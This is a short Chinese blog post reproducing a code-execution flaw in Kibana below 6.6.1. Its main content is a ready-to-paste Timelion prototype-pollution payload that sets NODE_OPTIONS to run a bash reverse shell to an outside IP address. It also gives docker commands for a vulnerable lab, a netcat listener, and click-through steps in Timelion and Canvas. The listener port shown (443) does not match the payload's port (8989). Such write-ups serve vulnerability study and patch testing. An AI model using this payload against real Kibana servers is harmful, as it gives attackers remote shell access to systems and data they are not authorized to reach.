Kibana < 6.6.1 代码执行漏洞复现笔记

  • 内容
  • 相关
Kibana是一个开源的分析和可视化平台,常被用于和Elasticsearch一起工作。用Kibana来搜索、查看、并和存储在Elasticsearch索引中的数据进行交互。

用户可以在大量数据之上创建条形图,折线图和散点图,或饼图和地图.

Kibana还提供了一个称为Canvas的演示工具,该工具使用户可以创建幻灯片平台,直接从Elasticsearch提取实时数据。



POC:


.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')


0x01 环境准备:


docker pull kibana:6.5.4

docker pull elasticsearch:6.5.4

docker network create somenetwork

docker run -d --name kibana --net somenetwork -p 5601:5601 kibana:6.5.4

docker run -d --name elasticsearch --net somenetwork -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" elasticsearch:6.5.4

3.png



0x02 复现过程:


    1. 登陆VPS并监听端口

        nc -l 443
1.png
    2. Timelion

        访问Timelion模块,粘贴POC并点击执行按钮

        

    3. Canvas

        点击Canvas模块,触发漏洞,成功反弹shell

2.png

本文标签:

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:Kibana < 6.6.1 代码执行漏洞复现笔记 - https://www.k1q.cn/post-49.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注